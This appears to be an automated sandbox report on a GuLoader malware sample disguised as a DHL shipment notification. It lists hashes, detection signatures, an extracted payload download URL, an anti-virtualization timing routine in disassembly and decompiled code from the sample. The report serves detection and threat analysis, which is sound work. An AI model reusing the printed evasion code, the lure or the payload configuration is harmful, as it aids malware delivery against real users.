Play interactive tour

Edit tour

Windows Analysis Report DHL Express shipment notification.exe

Overview

General Information

Sample Name:	DHL Express shipment notification.exe
Analysis ID:	532143
MD5:	26e034a56f86ed41cb3e869095ec73b7
SHA1:	a74551ce377aadbaae0b31b54b2536daaa832754
SHA256:	60ab75a94e04aa5dfab1a68da060a817e9f5ccb79f8a93d0c3dbfe47cb526b7d
Tags:	DHLexeGuLoadersigned
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

PE / OLE file has an invalid certificate

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

DHL Express shipment notification.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\DHL Express shipment notification.exe" MD5: 26E034A56F86ED41CB3E869095EC73B7)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downlo8"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlo8"}

Multi AV Scanner detection for submitted file

Show sources

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%			Perma Link
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downlo8

Source: DHL Express shipment notification.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DHL Express shipment notification.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DHL Express shipment notification.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: DHL Express shipment notification.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHL Express shipment notification.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DHL Express shipment notification.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DHL Express shipment notification.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHL Express shipment notification.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: DHL Express shipment notification.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: DHL Express shipment notification.exe	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: DHL Express shipment notification.exe, 00000000.00000002.778676915.00000000020D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exeFE2XW vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe

Source: DHL Express shipment notification.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021E6860	0_2_021E6860
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021DAA34	0_2_021DAA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021DDFFD	0_2_021DDFFD
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021E39E4	0_2_021E39E4

Source: DHL Express shipment notification.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Process Stats: CPU usage > 98%

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Source: DHL Express shipment notification.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal80.rans.troj.evad.winEXE@1/0@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_00406464 push edx; iretd	0_2_0040647C
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_0040A07F push ds; iretd	0_2_0040A095
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_004070A2 push 3E0AA415h; retf	0_2_004070B7
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_00403976 pushfd ; ret	0_2_0040398B
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021D26FB push eax; iretd	0_2_021D26FC
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021D4C6D push eax; iretd	0_2_021D4C6F

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

RDTSC instruction interceptor: First address: 00000000021E3495 second address: 00000000021E3495 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 36E14280h 0x00000007 xor eax, 7FA3071Ah 0x0000000c sub eax, F9689012h 0x00000011 sub eax, 4FD9B587h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F51E8F968F7h 0x0000001e lfence 0x00000021 mov edx, E407433Dh 0x00000026 add edx, 04D23EBAh 0x0000002c add edx, 3E86FD7Bh 0x00000032 xor edx, 589E7F66h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d jmp 00007F51E8F968DDh 0x00000042 test cl, al 0x00000044 cmp al, 3Fh 0x00000046 test ch, ah 0x00000048 ret 0x00000049 jmp 00007F51E8F968E9h 0x0000004e test ebx, 2244023Eh 0x00000054 sub edx, esi 0x00000056 ret 0x00000057 add edi, edx 0x00000059 dec dword ptr [ebp+000000F8h] 0x0000005f test ecx, ebx 0x00000061 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000068 jne 00007F51E8F967FAh 0x0000006a call 00007F51E8F96861h 0x0000006f call 00007F51E8F96918h 0x00000074 lfence 0x00000077 mov edx, E407433Dh 0x0000007c add edx, 04D23EBAh 0x00000082 add edx, 3E86FD7Bh 0x00000088 xor edx, 589E7F66h 0x0000008e mov edx, dword ptr [edx] 0x00000090 lfence 0x00000093 jmp 00007F51E8F968DDh 0x00000098 test cl, al 0x0000009a cmp al, 3Fh 0x0000009c test ch, ah 0x0000009e ret 0x0000009f mov esi, edx 0x000000a1 pushad 0x000000a2 rdtsc

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 0_2_021E3692 rdtsc

0_2_021E3692

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021E1E86 mov eax, dword ptr fs:[00000030h]	0_2_021E1E86
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021E2A85 mov eax, dword ptr fs:[00000030h]	0_2_021E2A85
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 0_2_021DCF89 mov eax, dword ptr fs:[00000030h]	0_2_021DCF89

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 0_2_021E3692 rdtsc

0_2_021E3692

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 0_2_021E6860 RtlAddVectoredExceptionHandler,

0_2_021E6860

Source: DHL Express shipment notification.exe, 00000000.00000002.778410130.0000000000CC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: DHL Express shipment notification.exe, 00000000.00000002.778410130.0000000000CC0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: DHL Express shipment notification.exe, 00000000.00000002.778410130.0000000000CC0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: DHL Express shipment notification.exe, 00000000.00000002.778410130.0000000000CC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: DHL Express shipment notification.exe, 00000000.00000002.778410130.0000000000CC0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL Express shipment notification.exe	25%	Virustotal		Browse
DHL Express shipment notification.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File
0.0.DHL Express shipment notification.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532143
Start date:	01.12.2021
Start time:	19:03:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL Express shipment notification.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.7% (good quality ratio 19.3%) Quality average: 27.9% Quality standard deviation: 32%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, tile-service.weather.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.288330717800927
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL Express shipment notification.exe
File size:	152728
MD5:	26e034a56f86ed41cb3e869095ec73b7
SHA1:	a74551ce377aadbaae0b31b54b2536daaa832754
SHA256:	60ab75a94e04aa5dfab1a68da060a817e9f5ccb79f8a93d0c3dbfe47cb526b7d
SHA512:	283eb6c75e024fac46085ea526b96844466b6b27861dbe047d37d3bde1d59e207241426b812030e8cb22d45441d6f4bdfd5c6d841b39eb21c9ac01bd7b0b346d
SSDEEP:	1536:bSyEql7Tg8Xxo5HCSJndCcIVdPsw4Jaev0Cq5pg:WyEql7Tg6hhTdkHwphg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...\|a.T.....................0............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54B7617C [Thu Jan 15 06:43:08 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b209c8634733456633136bfedc71877a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/1/2021 4:31:58 AM 12/1/2022 4:31:58 AM
Subject Chain	E=TVRESTES@ineluctable.Bir, CN=Studsendes, OU=Polyteknisk, O=Shelterdkkeren, L=DANNEBROGSKORS, S=Variabelerklringerne, C=BT
Version:	3
Thumbprint MD5:	6E23C2E0F1EAA5736459B248CD4F244F
Thumbprint SHA-1:	3EF79B4748A2F5E9C61B979020E0070FCAB22AF2
Thumbprint SHA-256:	1252758943828E279B0955645D9BFE6EBC24BAB29368FB5EFDC213D5B615F3A0
Serial:	00

Entrypoint Preview

Instruction
push 004019C8h
call 00007F51E8C86625h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+6C9B95C0h], dl
jle 00007F51E8C865E5h
dec eax
movsb
xor esp, ebp
add al, 17h
xchg dword ptr [ebx], eax
xchg dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+6Fh], dl
jnc 00007F51E8C866A5h
jnc 00007F51E8C866A6h
imul ebp, dword ptr [edi+6Eh], 00000073h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add byte ptr [ebp+27D3B3C4h], bh
sahf
inc eax
xchg dword ptr [ebp-3053F3DEh], ebp
das
cmp ch, byte ptr [ebx+29A901E3h]
jo 00007F51E8C865FEh
inc edi
xchg eax, edx
js 00007F51E8C86633h
fsub dword ptr [ecx+3A5A13C6h]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esi
add byte ptr [eax], al
add byte ptr [ecx+00h], dl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [ebx+70h], dh
popad
je 00007F51E8C8669Ah
popad
insb
add byte ptr [4A000F01h], cl
outsd
bound ebp, dword ptr [ebp+75h]
insb
imul esp, dword ptr [edi+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x218b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x958	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x24000	0x1498
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x234	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20fa4	0x21000	False	0.377485795455	data	5.3781600227	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x122c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x958	0x1000	False	0.173828125	data	2.03797872425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x24828	0x130	data
RT_ICON	0x24540	0x2e8	data
RT_ICON	0x24418	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x243e8	0x30	data
RT_VERSION	0x24150	0x298	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
LegalCopyright	Union
InternalName	Slesk8
FileVersion	4.00
CompanyName	Union
LegalTrademarks	Union
ProductName	Union
ProductVersion	4.00
FileDescription	Union
OriginalFilename	Slesk8.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: DHL Express shipment notification.exe PID: 6368 Parent PID: 1972

General

Start time:	19:05:00
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DHL Express shipment notification.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Express shipment notification.exe"
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: DHL Express shipment notification.exe PID: 6368 Parent PID: 1972 DHL Express shipment notification.exeCOMMON

Executed Functions

Function 021E6860, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction ID: 88d030a0f3f55c5b30a6abee24a29cc4aa7900e20d73560b0b2165ca7917b8b6
Opcode Fuzzy Hash: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction Fuzzy Hash: AA61D571644789CFEF39DE24CDA47EAB7A6AF95300F95411ACC0B8B294C7319A42CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6C4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041C6C4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				void* _v48;
				short _v52;
				short* _v64;
				char _v76;
				short _v84;
				void* _v88;
				short _v92;
				void* _v96;
				intOrPtr _v100;
				short _v104;
				void* _v108;
				void* _v112;
				char _v128;
				short _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				char _v168;
				long long _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				intOrPtr _v208;
				char _v216;
				intOrPtr _v224;
				char _v232;
				long long _v240;
				char _v248;
				char _v264;
				char* _v272;
				char _v280;
				char _v332;
				signed int _v336;
				signed int _v340;
				void* _v344;
				signed int _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				long long _v368;
				long long _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				char* _t658;
				signed short _t659;
				signed int _t671;
				char* _t675;
				short _t676;
				short _t685;
				short _t695;
				signed int _t704;
				signed int _t707;
				signed int _t708;
				signed int _t712;
				char* _t713;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t731;
				signed int _t732;
				signed int _t737;
				signed int _t738;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				char* _t747;
				signed int _t761;
				signed int* _t762;
				signed int _t771;
				char* _t772;
				char* _t776;
				signed int _t780;
				signed int _t797;
				signed int _t802;
				char* _t808;
				char* _t819;
				signed int _t822;
				signed int _t827;
				signed int* _t832;
				signed int _t836;
				signed char _t842;
				signed int _t845;
				char* _t848;
				signed int _t849;
				char* _t853;
				char* _t854;
				signed int _t857;
				signed int _t865;
				char* _t874;
				signed int* _t879;
				short _t882;
				signed int _t883;
				signed int _t885;
				signed int _t887;
				signed int _t889;
				char* _t891;
				short _t892;
				signed int _t897;
				signed int _t899;
				signed int _t901;
				short _t903;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t915;
				signed int _t921;
				signed int _t926;
				char* _t932;
				signed int _t989;
				signed int _t999;
				signed int _t1004;
				signed int _t1010;
				signed int _t1015;
				void* _t1065;
				void* _t1067;
				intOrPtr _t1068;
				void* _t1069;
				void* _t1070;
				void* _t1082;
				long long _t1086;

				_t1068 = _t1067 - 0xc;
				 *[fs:0x0] = _t1068;
				L00401540();
				_v16 = _t1068;
				_v12 = 0x401260;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t1065);
				_push(2);
				_push(0x4029ac);
				_push( &_v76);
				L0040186A();
				_v272 = L"Hjortens";
				_v280 = 8;
				L0040184C();
				_push( &_v184);
				_push( &_v200);
				L00401852();
				_push( &_v200);
				_t658 =  &_v144;
				_push(_t658);
				L00401858();
				_push(_t658);
				L0040185E();
				_v208 = _t658;
				_v216 = 8;
				_t659 =  &_v216;
				_push(_t659);
				L00401864();
				asm("sbb eax, eax");
				_v380 =  ~( ~_t659 + 1);
				_t932 =  &_v144;
				L00401846();
				_push( &_v216);
				_push( &_v200);
				_push( &_v184);
				_push(3);
				L00401840();
				_t1069 = _t1068 + 0x10;
				if(_v380 != 0) {
					_push(L"7:7:7");
					__eax =  &_v184;
					_push( &_v184); // executed
					L0040182E(); // executed
					__eax =  &_v184;
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
					_v272 = L"Readjust";
					_v280 = 8;
					L0040184C();
					__eax =  &_v184;
					_push( &_v184);
					__eax =  &_v200;
					_push( &_v200);
					L0040181C();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v144;
					L00401858();
					_push(L"CANNIBALEAN");
					_push(L"Bursati");
					_push(L"multivalent"); // executed
					L00401822(); // executed
					L00401846();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v184;
					_push( &_v184);
					_push(2);
					L00401840();
					__esp = __esp + 0xc;
				}
				_push( &_v184);
				L0040180A();
				_push( &_v184);
				_t1082 =  *0x401258;
				_push(_t932);
				_push(_t932);
				_v92 = _t1082;
				_push(0x40251c);
				_push( &_v200);
